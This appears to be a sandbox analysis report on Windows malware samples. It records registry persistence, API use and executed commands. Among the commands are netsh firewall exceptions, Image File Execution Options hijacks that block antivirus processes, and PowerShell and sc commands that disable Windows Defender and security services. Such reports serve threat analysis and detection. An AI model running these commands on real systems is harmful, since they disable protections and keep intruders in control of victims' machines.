HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::failed_count RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state  RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes (NULL) RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes  RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKCU\software\microsoft\edge\elfbeacon::version 139.0.3405.125 RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state  RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::google updater C:\Users\Ucibtiup\AppData\Roaming\Microsoft\SysAudio.exe RegNtPreCreateKey
HKCU\software\6a7601a6c8893a57a9f43a5489aa7ae7::hp bXVyZGVyMjIyMi0zOTYyNS5wb3J0bWFwLmhvc3Q6Mzk2MjU6Mzk2MjUs RegNtPreCreateKey
HKCU::di ! RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKCU\environment::see_mask_nozonechecks 1 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 뙧嵖佩ǜ RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::6a7601a6c8893a57a9f43a5489aa7ae7 "C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" .. RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::hp NDUuMTQ1LjQxLjE3ODoyMjIyLA== RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::i ! RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" .. RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" .. RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 놑묉彗ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 똋뱒彗ǜ RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::hp MTI3LjAuMC4xOjEs RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::i ! RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 點鳿惒ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\advanced::hidden RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel::cpls Top level key RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel\cpls:: C:\ProgramData\ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 怜亸肇ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꬺ黌鴖ǜ RegNtPreCreateKey
HKCU\software\1d0146db06ff2d2e93b6777d422f7734::us @ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\runonce::runtimebroker "C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe" RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 쉓ꖕ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꖜ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 귾ꖡ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psuamain.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 宑ꗰ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 艿ꗷ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psanhost.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ㄱꙆ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 맏ꙏ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fsma32.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 碇ꛐ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 龦ꛗ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fshoster.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㩽꜓옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 慞ꜚ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\masvc.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 샺Ꝛ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 폍ꝭ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\mcshield.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ㏢Ɪ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ᰗꟸ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꟼ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ࠖꠄ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 醽ꠍ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 噐ꠒ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⶕ꠪옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 枘ꡄ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 죵ꡥ옯ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\nortonsecurity.exe::debugger cmd.exe /c echo RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 搷ꢂ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ǵꢟ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㪨ꢹ옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䶎꣌옯ǜ RegNtPreCreateKey
HKLM\software\policies\microsoft\windows defender\spynet::submitsamplesconsent  RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 슠꣡옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⏍꤃옯ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㙪ꤖ옯ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAdjustPrivilegesToken
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
Show More
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelIoFileEx
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateUserProcess
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtGetContextThread
  • ntdll.dll!NtGetWriteWatch
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtLockFile
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory

179 additional items are not displayed above.

User Data Access
  • GetComputerName
  • GetComputerNameEx
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
  • OpenClipboard
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges
  • SetWindowsHookEx
Anti Debug
  • CheckRemoteDebuggerPresent
  • IsDebuggerPresent
  • NtQuerySystemInformation
  • OutputDebugString
Network Winsock2
  • WSAConnect
  • WSASend
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • bind
  • closesocket
  • freeaddrinfo
  • getaddrinfo
  • getpeername
  • inet_addr
  • recv
  • send
  • setsockopt
Network Winhttp
  • WinHttpOpen
Network Info Queried
  • GetAdaptersAddresses
  • GetNetworkParams
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ReadProcessMemory
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • ShellExecuteEx
  • WriteConsole
Keyboard Access
  • GetAsyncKeyState
  • GetKeyState
Service Control
  • OpenSCManager
  • OpenService
Process Terminate
  • TerminateProcess
Network Icmp
  • IcmpCreateFile
  • IcmpSendEcho2

Shell Command Execution

C:\WINDOWS\system32\fondue.exe "C:\WINDOWS\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 944
(NULL) c:\users\user\downloads\tt.pdf
(NULL) c:\users\user\downloads\joliehack.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 936
Show More
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 960
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\Server.exe
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\dis.exe
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\3.exe
(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\1234.exe
(NULL) C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe
netsh firewall add allowedprogram "C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
(NULL) C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe
netsh firewall add allowedprogram "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
(NULL) C:\Users\Qcobdeuv\AppData\Roaming\server.exe
netsh firewall add allowedprogram "C:\Users\Qcobdeuv\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 904
"powershell.exe"
"C:\Users\Ieqllttt\AppData\Local\Temp\is-JH3NH.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp" /SL5="$50376,8477257,886272,c:\users\user\downloads\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323"
(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\SAM X222C#.exe
(NULL) C:\Users\Raratezd\AppData\Local\Temp\winter.bll
"C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe"
"C:\Users\Falneayq\AppData\Local\Microsoft\CLR\conhost.exe" --watcher 5744
"sc" query "WindowsHealthMonitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUAMain.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"powershell" -EP Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableScriptScanning $true -DisableBlockAtFirstSeen $true"
"sc" create "WindowsHealthMonitor" binPath= "C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe" start= auto DisplayName= "Windows System Health Monitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] CreateServi
"sc" description "WindowsHealthMonitor" "Monitors system health and performance diagnostics."
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FSMA32.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] ChangeServi
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"sc" failure "WindowsHealthMonitor" reset= 0 actions= restart/60000/restart/60000/restart/60000
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masvc.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"sc" start "WindowsHealthMonitor"
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McShield.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
WriteConsole: [SC] StartServic
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NortonSecurity.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
"sc.exe" stop "WinDefend"
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
"sc.exe" config "WinDefend" start= disabled
"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
"net.exe" stop "WinDefend" /y
"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
"sc.exe" stop "WdNisSvc"
"sc.exe" config "WdNisSvc" start= disabled
"net.exe" stop "WdNisSvc" /y
"sc.exe" stop "SecurityHealthService"
"sc.exe" config "SecurityHealthService" start= disabled
"net.exe" stop "SecurityHealthService" /y
"sc.exe" stop "wscsvc"
"sc.exe" config "wscsvc" start= disabled
"net.exe" stop "wscsvc" /y
"sc.exe" stop "Sense"
"sc.exe" config "Sense" start= disabled
WriteConsole: [SC] OpenService
"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f
"net.exe" stop "Sense" /y
"sc.exe" stop "McShield"
"sc.exe" config "McShield" start= disabled
"net.exe" stop "McShield" /y
"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
"sc.exe" stop "masvc"
"sc.exe" config "masvc" start= disabled
"reg" QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid

Trending

Most Viewed

Loading...